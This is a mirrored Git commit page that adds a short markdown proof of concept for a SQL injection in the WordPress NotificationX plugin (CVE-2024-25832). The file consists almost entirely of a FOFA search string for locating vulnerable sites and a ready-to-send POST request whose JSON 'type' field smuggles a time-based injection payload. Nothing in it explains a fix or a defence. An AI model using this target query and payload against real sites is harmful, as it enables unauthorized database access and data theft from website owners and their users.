admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create WordPress插件NotificationX存在sql注入漏洞(CVE-2024-25832).md

Browse Source
This commit is contained in:
wy876 2024-04-28 20:27:08 +08:00 committed by GitHub
parent a45dd827a5
commit a53115d03c
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 15 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
WordPress插件NotificationX存在sql注入漏洞(CVE-2024-25832).md Normal file
View File

@ -0,0 +1,15 @@
## WordPress插件NotificationX存在sql注入漏洞(CVE-2024-25832)
## fofa
```
body="/wp-content/plugins/notificationx"
```
## poc
```
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host:
Content-Type: application/json
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
```